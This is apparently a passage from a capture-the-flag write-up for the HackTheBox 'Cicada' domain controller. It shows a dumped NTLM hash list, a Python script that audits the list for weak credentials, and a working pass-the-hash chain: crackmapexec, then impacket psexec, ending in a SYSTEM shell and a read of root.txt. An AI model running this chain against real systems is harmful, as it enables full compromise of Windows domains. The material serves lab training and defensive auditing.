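Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\\svc1.constructed:1105:0123456789abcdef0123456789abcdef:00112233445566778899aabbccddeeff:::
cicada.htb\\svc2.constructed:1106:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"    # LM hash of "" / LM storage disabled
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
LINE = re.compile(r"^(?:[^\\:]+\\)?([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::", re.I)


def parse_dump(text):
    """Yield {user, rid, lm, nt} for every hash line; other output lines are skipped.
    A 'domain\\user' prefix is dropped so account names compare cleanly."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            yield {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def audit_hashdump(text):
    """Weak-credential findings: empty passwords, LM hashes still present, and NT
    hashes shared by more than one account (the same password reused)."""
    entries = list(parse_dump(text))
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "accounts": len(entries),
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT_HASH],
        "lm_hash_present": [e["user"] for e in entries if e["lm"] != NO_LM_HASH],
        "shared_nt_hash": sorted(users for users in by_nt.values() if len(users) > 1),
    }


if __name__ == "__main__":
    for key, value in audit_hashdump(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Guest is flagged for an empty password, which is harmless only as long as the account stays disabled; shared NT hashes are the finding that usually matters most, because one reset covers every account in the group.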
crackmapexec smb 10.129.96.74 -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
SMB 10.129.96.74 445 CICADA-DC [*] Windows 10.0 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.96.74 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
psexec.py -hashes :2b87e7c93a3e8a0ea4a581937016f341 administrator@10.129.96.74
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.129.96.74.....
[*] Found writable share ADMIN$
[*] Uploading file CbQpkYiC.exe
[*] Opening SVCManager on 10.129.96.74.....
[*] Creating service Payu on 10.129.96.74.....
[*] Starting service Payu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2700]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
CICADA-DC
SYSTEM-SHELL !
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B60-8905
Directory of C:\Users\Administrator\Desktop
08/30/2024 10:06 AM <DIR> .
08/26/2024 01:10 PM <DIR> ..
10/24/2024 02:14 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 1,412,972,544 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
ROOT.TXT: [REDACTED]
53446/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows